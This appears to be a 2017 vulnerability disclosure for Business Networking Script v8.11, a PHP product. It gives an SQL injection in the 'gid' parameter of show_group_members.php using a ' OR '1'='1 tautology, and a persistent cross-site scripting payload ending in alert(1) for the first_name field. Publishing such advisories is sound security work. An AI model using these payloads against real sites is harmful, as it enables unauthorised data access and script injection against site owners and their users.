Business Networking Script 8.11 Cross Site Scripting / SQL Injection
Posted on 17 January 2017
# Exploit Title : ----------- : Business Networking Script v8.11- SQLi & Persistent Cross Site Scripting # Author : ----------------- : Ahmet Gurel # Google Dork : --------- : - # Date : -------------------- : 16/01/2017 # Type : -------------------- : webapps # Platform : --------------- : PHP # Vendor Homepage : http://itechscripts.com/business-networking-script/ # Sofware Price and Demo : $299.00 http://professional-network.itechscripts.com ########## 1-SQL Injection ########## ##### Vulnerable Parameter Type : GET ##### Vulnerable Parameter : gid ##### Vulnerable URL : http://localhost/[PATH]/show_group_members.php?gid=[SQLi] ##### SQLi Parameter : ' OR '1'='1 ########## 2-Persistent XSS Payload ########## ##### Vulnerable URL : http://localhost/[PATH]/home.php ##### Vuln. Parameter: first_name= ##### PAYLOAD : '"--></style></Script><Script>alert(1)</Script>